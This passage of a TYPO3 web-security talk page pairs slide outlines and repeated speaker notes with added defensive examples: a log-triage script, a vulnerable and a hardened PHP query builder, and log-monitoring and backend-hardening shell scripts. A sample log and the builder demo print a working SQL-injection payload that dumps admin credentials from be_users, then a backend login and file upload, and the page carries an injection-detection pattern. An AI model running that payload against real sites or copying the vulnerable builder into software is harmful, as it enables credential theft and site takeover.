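178.122.0.0 - - [17/Dec/2010:14:03:42 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=979'&tx_galleryexample_pi2%5Byear%5D=2010 HTTP/1.1" 200 31220 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
178.122.0.0 - - [17/Dec/2010:14:04:38 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=979'&tx_galleryexample_pi2%5Byear%5D=2010+order+by+10+-- HTTP/1.1" 200 31220 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
178.122.0.0 - - [17/Dec/2010:14:09:04 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=979'&tx_galleryexample_pi2%5Byear%5D=-2010+union+select+1,2,3,group_concat(concat_ws(0x3a3a,username,password,admin)),5+from+be_users+where+admin=1+-- HTTP/1.1" 200 31977 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
178.122.0.0 - - [17/Dec/2010:14:21:48 +0100] "POST /typo3/index.php HTTP/1.1" 302 0 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
178.122.0.0 - - [17/Dec/2010:14:21:50 +0100] "GET /typo3/backend.php HTTP/1.1" 200 18222 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
178.122.0.0 - - [17/Dec/2010:14:22:32 +0100] "POST /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/ HTTP/1.1" 200 1202 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
178.122.0.0 - - [17/Dec/2010:14:22:46 +0100] "GET /typo3conf/ext/realurlmanagement/title.php HTTP/1.1" 200 812 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
198.51.100.9 - - [17/Dec/2010:14:30:01 +0100] "GET /glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Dec/2010:14:31:15 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=12&tx_galleryexample_pi2%5Byear%5D=2009 HTTP/1.1" 200 30811 "-" "Mozilla/5.0"
LOG;

// Apache "combined" format up to the status and size fields.
const LOG_RE  = '/^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<url>\S+) [^"]*" (?<status>\d{3}) \S+/';
// Injection vocabulary seen in the case study plus the usual suspects.
const SQLI_RE = '/\bunion\b.*\bselect\b|\border\s+by\s+\d+|\b(?:be_users|fe_users|information_schema)\b|group_concat\s*\(|--\s*$|\'\s*(?:or|and)\b/i';

function parseLine(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    $url = parse_url($m['url']) ?: [];
    $ts  = DateTime::createFromFormat('d/M/Y:H:i:s O', $m['time']);
    return [
        'ip' => $m['ip'], 'time' => $m['time'], 'ts' => $ts ? $ts->getTimestamp() : 0,
        'method' => $m['method'], 'path' => $url['path'] ?? '/',
        'query' => urldecode($url['query'] ?? ''),   // %5B -> [ and + -> space, as PHP saw it
        'status' => (int)$m['status'],
    ];
}

/** Tags one parsed request; an empty array means ordinary traffic. */
function classify(array $r): array
{
    $tags = [];
    if ($r['query'] !== '' && preg_match(SQLI_RE, $r['query'])) {
        $tags[] = 'sqli';
    } elseif (preg_match('/=[^&]*\'(?:&|$)/', $r['query'])) {
        $tags[] = 'sqli-probe';                        // lone quote appended to a value
    }
    if ($r['path'] === '/typo3/index.php' && $r['method'] === 'POST') {
        $tags[] = 'be-login';                          // backend login form submitted
    }
    if ($r['path'] === '/typo3/backend.php' && $r['status'] === 200) {
        $tags[] = 'be-session';                        // backend frame served: login succeeded
    }
    if (strpos($r['path'], '/typo3conf/ext/') === 0) {
        if (stripos($r['query'], 'action=upload') !== false) {
            $tags[] = 'ext-upload';                    // file written into an extension dir
        } elseif (substr($r['path'], -4) === '.php') {
            $tags[] = 'ext-php-direct';                // PHP below typo3conf/ext/ called directly
        }
    }
    return $tags;
}

/** Per-IP correlation; assumes the log is in chronological order. */
function triage(string $log, int $windowSeconds = 3600): array
{
    $perIp = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parseLine($line);
        if ($r === null || ($tags = classify($r)) === []) {
            continue;
        }
        $perIp[$r['ip']][] = ['ts' => $r['ts'], 'time' => $r['time'], 'tags' => $tags];
    }
    $report = [];
    foreach ($perIp as $ip => $events) {
        $tags = array_values(array_unique(array_merge(...array_column($events, 'tags'))));
        $last = end($events);
        $sqli = in_array('sqli', $tags, true);
        $verdict = 'probing';
        if ($sqli && in_array('be-login', $tags, true) && $last['ts'] - $events[0]['ts'] <= $windowSeconds) {
            $verdict = 'credentials likely extracted and used';
        }
        if ($sqli && in_array('ext-upload', $tags, true)) {
            $verdict = 'COMPROMISED: check typo3conf/ext/ for foreign PHP files';
        }
        $report[$ip] = ['tags' => $tags, 'verdict' => $verdict,
                        'first' => $events[0]['time'], 'last' => $last['time']];
    }
    return $report;
}

if (PHP_SAPI === 'cli') {
    $log = isset($argv[1]) ? (string)file_get_contents($argv[1]) : SAMPLE_LOG;
    foreach (triage($log) as $ip => $r) {
        printf("%-14s %s .. %s\n    %s\n    %s\n", $ip, $r['first'], $r['last'], implode(',', $r['tags']), $r['verdict']);
    }
}
```

Run it as `php triage.php /var/log/apache2/access.log`; without an argument it uses the constructed sample and reports 178.122.0.0 as compromised (tags sqli-probe, sqli, be-login, be-session, ext-upload, ext-php-direct) and 198.51.100.9 as merely probing, while 203.0.113.7 is not listed. `ext-php-direct` hits need a human look, since some legitimate extensions do expose PHP files below typo3conf/ext/; what makes the verdict is the order of events: injection first, backend login next, then a write into the extension directory. None of this works if the intruder can edit the log, which is why the speaker notes say to keep Apache and TYPO3 logs where the web server user cannot write.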
  • 48. Knowing the Enemy / Conclusion
  • 49-53. Knowing the Enemy / Conclusion: Hackers know what they are doing; They know TYPO3 very well; They also use automated tools; They often try to obfuscate the hack; With automated attacks effort is low, gain is high
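What the attacker found at 14:04:38 is a frontend plugin that concatenates its piVars into SQL. The PHP below is an added example for this write-up, not the talk's code and not any real TYPO3 extension: a vulnerable WHERE builder with the shape the log implies (uid cast, year pasted in raw) next to a hardened one that follows the TYPO3 4.x idiom of intval() for numbers and fullQuoteStr() for strings. The plugin key and parameter names come from the log excerpts; the table name tx_galleryexample_items and the optional title filter are invented for the demo, and a local fullQuoteStr() stand-in with the same escaping replaces $GLOBALS['TYPO3_DB']->fullQuoteStr(), which needs a live database connection.

```php
<?php
// Added example; not from the talk, not a real extension. Vulnerable WHERE
// builder (as the case study implies) beside the hardened TYPO3 4.x form.
// Assumed: table tx_galleryexample_items, the "title" filter, and the local
// fullQuoteStr() stand-in for $GLOBALS['TYPO3_DB']->fullQuoteStr().
declare(strict_types=1);

/** Stand-in for t3lib_DB::fullQuoteStr(): mysql_real_escape_string()-style escaping, then quotes. */
function fullQuoteStr(string $str): string
{
    $map = ["\\" => "\\\\", "'" => "\\'", "\"" => "\\\"", "\0" => "\\0",
            "\n" => "\\n", "\r" => "\\r", "\x1a" => "\\Z"];
    return "'" . strtr($str, $map) . "'";
}

/**
 * VULNERABLE, with the shape the log implies: uid happens to be cast (so the
 * stray quote in uid=979' did no harm), year is pasted in verbatim and is
 * the injection point found at 14:04:38.
 */
function buildWhereVulnerable(array $piVars): string
{
    return 'uid=' . (int)$piVars['uid'] . ' AND year=' . $piVars['year'];
}

/**
 * HARDENED: every value is either cast to int and range-checked, or quoted.
 * In a real plugin the result goes to
 *   $GLOBALS['TYPO3_DB']->exec_SELECTgetRows('*', 'tx_galleryexample_items', $where)
 * and the quoting call is $GLOBALS['TYPO3_DB']->fullQuoteStr($v, 'tx_galleryexample_items').
 */
function buildWhereHardened(array $piVars): string
{
    $uid  = (int)($piVars['uid'] ?? 0);
    $year = (int)($piVars['year'] ?? 0);
    if ($uid < 1 || $year < 1900 || $year > 2100) {
        // Reject rather than silently repair: "-2010 union select ..." is an
        // attack, not a typo, and should end up in the log as such.
        throw new InvalidArgumentException('gallery parameters out of range');
    }
    $where = 'uid=' . $uid . ' AND year=' . $year;
    if (isset($piVars['title']) && $piVars['title'] !== '') {
        $where .= ' AND title=' . fullQuoteStr((string)$piVars['title']);   // quoted, never interpolated
    }
    return $where;
}

// The 14:09:04 payload from slide 45, as PHP receives it after URL decoding.
const PAYLOAD = [
    'uid'  => "979'",
    'year' => '-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'
            . 'group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 '
            . 'from be_users where admin=1 -- ',
];

echo "vulnerable: SELECT * FROM tx_galleryexample_items WHERE "
    . buildWhereVulnerable(PAYLOAD) . "\n";
try {
    echo "hardened:   " . buildWhereHardened(PAYLOAD) . "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened:   request rejected (" . $e->getMessage() . ")\n";
}
// A legitimate request with a quote in free text stays a plain string literal.
echo "hardened:   SELECT * FROM tx_galleryexample_items WHERE "
    . buildWhereHardened(['uid' => '979', 'year' => '2010', 'title' => "O'Brien' OR 1=1 -- "]) . "\n";
```

The vulnerable line prints the full UNION against be_users as the database would execute it; the hardened builder throws on the same input because (int) reduces the payload to -2010, which fails the range check, and the third call shows the quote inside a free-text value being escaped rather than terminating the literal. The same two rules (cast numbers, quote strings, no exceptions) are what the "Security issues in (outdated) TYPO3 extensions" attack vector comes down to for extension authors.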
  • 54. Mitigation
  • 55-60. Mitigation / Mandatory steps: Monitor and back up your website; Read the announce mailing list and bulletins carefully; Use up-to-date software; Use saltedpasswords and advise your admins (and users) to use non-obvious passwords; Make your integrators aware of possible TypoScript problems
  • 61-65. Mitigation / Advanced steps: Use TYPO3 core features in favour of extensions; Use protected backend access; Consider using mod_security; Consider using the phpids TYPO3 extension
  • 66. TYPO3 Security Team
  • 67-71. TYPO3 Security Team / Important things to know: Responsible Disclosure Policy; One communication channel (security@typo3.org); Pre-announcements for critical issues only; You can support us
  • 72. Resources: PHP-Sicherheit (Christopher Kunz and Stefan Esser); Essential PHP Security (Chris Shiflett); http://www.owasp.org/; http://typo3.org/teams/security/security-bulletins/; http://typo3.org/teams/security/resources/; http://buzz.typo3.org/teams/security/
  • 73. Questions?
  • 74. Thank You!

Notas do Editor

  1. 1\n2\n3\n4\n5\n6\n7\n
  2. \n
  3. \n
  4. Interrupt me immediatly if you have questions\n
  5. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\nWhy it is important to define?\n\n\n
  6. It depends ;)\n\n
  7. Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  8. Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  9. Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  10. \n
  11. Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  12. Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  13. Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  14. Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  15. Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  16. Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  17. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  18. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  19. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  20. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  21. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  22. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
43. Automated tools:
* LizaMoon (2011 mass SQL-injection campaign)

Obfuscate:
* Google conditional attack: the injected payload is served only under a condition such as a Google referrer, so the owner opening the site directly sees a clean page

Gain:
* even „small websites“ are targeted
48. Web application security,
not personal nor governmental security.
Nevertheless there are similarities, which I use to explain.
49. Monitoring:
* suspicious activity / load on the server

Up-to-date software:
* OS, PHP, TYPO3, extensions
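The "suspicious activity / load on the server" point, as an added example that is neither from the talk nor from TYPO3: three awk one-liners over an Apache access log in combined format that pick out a scanner (many 404s from one client), a password guesser hammering the backend login, and the minutes with the highest request rate. The log lines, addresses and thresholds are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the talk: pull "suspicious activity" out of an Apache
# combined-format access log with awk.  Fields: $1 client, $4 "[timestamp",
# $6 "\"METHOD", $7 path, $9 status.  Sample log and thresholds are constructed.

# Clients with more than $2 responses of status 404 in log $1: a client that
# keeps asking for files that do not exist is probing for backups, admin
# panels and known-vulnerable extensions.  Output: "<count> <ip>".
scanner_candidates() {
    awk -v limit="$2" '$9 == 404 { n[$1]++ }
        END { for (ip in n) if (n[ip] > limit) print n[ip], ip }' "$1" | sort -rn
}

# Clients with more than $2 POSTs to the backend login (/typo3/index.php):
# a legitimate editor logs in once, a password guesser hundreds of times.
backend_bruteforce_candidates() {
    awk -v limit="$2" 'substr($6, 2) == "POST" && $7 ~ /^\/typo3\/index\.php/ { n[$1]++ }
        END { for (ip in n) if (n[ip] > limit) print n[ip], ip }' "$1" | sort -rn
}

# Requests per minute, busiest first: a sudden step in this table is the
# "load on the server" the notes mention, whether crawler, flood or spam bot.
requests_per_minute() {
    awk '{ n[substr($4, 2, 17)]++ } END { for (m in n) print n[m], m }' "$1" | sort -rn
}

# One combined-format line; everything but client/method/path/status is fixed.
log_line() {
    printf '%s - - [10/Jun/2011:09:12:00 +0200] "%s %s HTTP/1.1" %s 512 "-" "Mozilla/5.0"\n' \
        "$1" "$2" "$3" "$4"
}

# Constructed sample: an ordinary visitor, a scanner, and a login brute-forcer.
make_sample_log() {
    f=$(mktemp)
    {
        i=0; while [ $i -lt 5 ];  do log_line 192.0.2.10   GET  "/index.php?id=$i"  200; i=$((i+1)); done
        i=0; while [ $i -lt 25 ]; do log_line 198.51.100.9 GET  "/old/backup$i.sql" 404; i=$((i+1)); done
        i=0; while [ $i -lt 12 ]; do log_line 203.0.113.7  POST "/typo3/index.php"  200; i=$((i+1)); done
        log_line 192.0.2.10 GET  /typo3/index.php 200
        log_line 192.0.2.10 POST /typo3/index.php 302
    } > "$f"
    printf '%s\n' "$f"
}

# Usage: sh suspicious.sh /var/log/apache2/access.log ; no argument uses the sample.
if [ $# -gt 0 ]; then
    log=$1; cleanup=
else
    log=$(make_sample_log); cleanup=$log
fi
echo "== more than 10 x 404 =="; scanner_candidates "$log" 10
echo "== more than 5 backend login POSTs =="; backend_bruteforce_candidates "$log" 5
echo "== requests per minute =="; requests_per_minute "$log"
[ -z "$cleanup" ] || rm -f "$cleanup"
```

The thresholds are deliberately low for the sample; on a real site pick them from a week of normal traffic, and treat the backend-login count as the one worth an alert rather than a report, since a guessed editor password is the shortest path to the whole installation.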
55. TYPO3 core features:
* use core features where possible: the core is much better maintained and has the better code base

Protected backend:
* no FTP! (credentials and content travel in clear text); SSL; protect with HTTP auth and/or restrict access to certain IPs
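The "protected backend" measures above, as an added example that is not from the talk or the TYPO3 project: a weak Apache 2.2 virtual host next to a hardened one (TLS only, HTTP auth, and a source-address restriction that must both hold), plus a small shell check that reads the `<Location /typo3/>` block and names every protection that is missing. Both config fragments are constructed for the demo; the directive names are Apache's own.

```shell
#!/bin/sh
# Added example, not from the talk: check an Apache 2.2 vhost for the backend
# protections from the notes (TLS only, HTTP auth, restricted source IPs) and
# show a weak configuration beside a corrected one.  Both configs are constructed.

# Print the body of the <Location /typo3/> block in config file $1.
typo3_location_block() {
    awk 'tolower($0) ~ /^[ \t]*<location[ \t]+\/typo3\/?>/ { inside = 1; next }
         tolower($0) ~ /^[ \t]*<\/location>/               { inside = 0 }
         inside' "$1"
}

# Print every required protection that is missing from config $1; exit 0 only
# when all are present.  "Satisfy all" is what makes auth AND IP both required.
check_backend_protection() {
    block=$(typo3_location_block "$1")
    missing=0
    for rule in \
        'SSLRequireSSL=tls-only' \
        'AuthType[[:space:]]+Basic=http-auth' \
        'Require[[:space:]]+valid-user=http-auth-required' \
        'Deny[[:space:]]+from[[:space:]]+all=deny-by-default' \
        'Allow[[:space:]]+from[[:space:]]+[0-9]=ip-restriction' \
        'Satisfy[[:space:]]+all=auth-and-ip'
    do
        pattern=${rule%%=*}; name=${rule#*=}
        printf '%s\n' "$block" | grep -Eiq "^[[:space:]]*$pattern" \
            || { echo "missing: $name ($pattern)"; missing=1; }
    done
    return $missing
}

# Weak: HTTP auth only, reachable over plain HTTP from anywhere.
weak_config() {
    cat <<'EOF'
<VirtualHost *:80>
    DocumentRoot /var/www/site
    <Location /typo3/>
        AuthType Basic
        AuthName "TYPO3 backend"
        AuthUserFile /etc/apache2/typo3.htpasswd
        Require valid-user
        Allow from all
    </Location>
</VirtualHost>
EOF
}

# Hardened: TLS required, HTTP auth, and only the office network may even try.
hardened_config() {
    cat <<'EOF'
<VirtualHost *:443>
    DocumentRoot /var/www/site
    SSLEngine on
    <Location /typo3/>
        SSLRequireSSL
        AuthType Basic
        AuthName "TYPO3 backend"
        AuthUserFile /etc/apache2/typo3.htpasswd
        Require valid-user
        Order deny,allow
        Deny from all
        Allow from 192.0.2.0/24
        Satisfy all
    </Location>
</VirtualHost>
EOF
}

# Usage: sh check_backend.sh /etc/apache2/sites-enabled/site.conf ; with no
# argument the two constructed fragments are compared.
if [ $# -gt 0 ]; then
    check_backend_protection "$1"
else
    for cfg in weak hardened; do
        tmp=$(mktemp); "${cfg}_config" > "$tmp"
        echo "== $cfg configuration =="
        if check_backend_protection "$tmp"; then echo "all backend protections present"; fi
        rm -f "$tmp"
    done
fi
```

Keep the htpasswd file outside the document root, and remember that the IP restriction only helps as long as the listed network is really yours; editors working from home need a VPN into it rather than an ever-growing Allow list.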
60. RD (responsible disclosure):
* publish the issue together with a fix (may take some time)

Communication:
* everything you suspect to be security-related: let us know!

Pre-announcement:
* if no pre-announcement is made, the issue is not critical
* we try to release in the first half of the week (mostly Tuesday)

Support:
* good reports
* send friendly reminders
* donate money